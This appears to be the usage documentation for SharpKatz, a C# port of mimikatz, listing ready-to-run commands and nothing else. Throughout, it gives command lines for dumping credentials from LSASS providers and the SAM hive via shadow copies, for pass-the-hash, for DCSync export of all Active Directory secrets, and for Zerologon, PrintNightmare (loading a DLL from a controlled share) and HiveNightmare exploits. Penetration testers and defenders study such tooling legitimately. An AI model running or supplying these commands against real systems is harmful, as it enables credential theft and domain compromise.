Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands
Usage
Ekeys
SharpKatz.exe --Command ekeys
list Kerberos encryption keys
Msv
SharpKatz.exe --Command msv
Retrive user credentials from Msv provider
Kerberos
SharpKatz.exe --Command kerberos
Retrive user credentials from Kerberos provider
Tspkg
SharpKatz.exe --Command tspkg
Retrive user credentials from Tspkg provider
Credman
SharpKatz.exe --Command credman
Retrive user credentials from Credman provider
WDigest
SharpKatz.exe --Command wdigest
Retrive user credentials from WDigest provider
Logonpasswords
SharpKatz.exe --Command logonpasswords
Retrive user credentials from all providers
List shadowcopies
SharpKatz.exe --Command listshadows
Enumerate shadowcopies with NtOpenDirectoryObject and NtQueryDirectoryObject
Lsadumpsam
SharpKatz.exe --Command dumpsam --System \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM --Sam \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SAM
Dump credential from provided sam database
Pth
SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash
Perform pth to create a process under userdomain\username credential with ntlm hash of the user's password
SharpKatz.exe --Command pth --User username --Domain userdomain --Rc4 rc4key
Perform pth to create a process under userdomain\username credential user's rc4 key
SharpKatz.exe --Command pth --Luid luid --NtlmHash ntlmhash
Replace ntlm hash for an existing logonsession
SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash --aes256 aes256
Perform pth to create a process under userdomain\username credential with ntlm hash of the user's password and aes256 key
DCSync
SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc
Dump user credential by username
SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc
Dump user credential by GUID
SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc
Export the entire dataset from AD to a file created in the current user's temp forder
SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword
Dump user credential by username using alternative credentials
SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword
Dump user credential by GUID using alternative credentials
SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword
Export the entire dataset from AD to a file created in the current user's temp forder using alternative credentials
Zerologon
No reference to logoncli.dll, using the direct rpc call works even from a non-domain joined workstation
SharpKatz.exe --Command zerologon --Mode check --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$
Perform Zerologon check
SharpKatz.exe --Command zerologon --Mode exploit --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$
Perform Zerologon attack
SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --User krbtgt --DomainController WIN-NSE5CPCP07C.testlab2.local
Perform Zerologon attack and dump user credential by username
SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --Guid guid --DomainController WIN-NSE5CPCP07C.testlab2.local
Perform Zerologon attack and dump user credential by GUID
SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --DomainController WIN-NSE5CPCP07C.testlab2.local
Perform Zerologon attack and export the entire dataset from AD to a file created in the current user's temp forder
Note: Do not use zerologon in a production environment or at least plan for recovery actions which are detailed here
PrintNightmare CVE-2021-1675 - CVE-2021-34527
SharpKatz.exe --Command printnightmare --Target dc --Library \\\\mycontrolled\\share\\fun.dll
Perform PrintNightmare attack
SharpKatz.exe --Command printnightmare --Target dc --Library \\\\mycontrolled\\share\\fun.dll --AuthUser user --AuthPassword password --AuthDomain dom
Perform PrintNightmare attack with provided credentials
HiveNightmare CVE-2021-36934
SharpKatz.exe --Command hiveghtmare
Exploit HiveNightmare vulnerability selecting the first available shadowcopy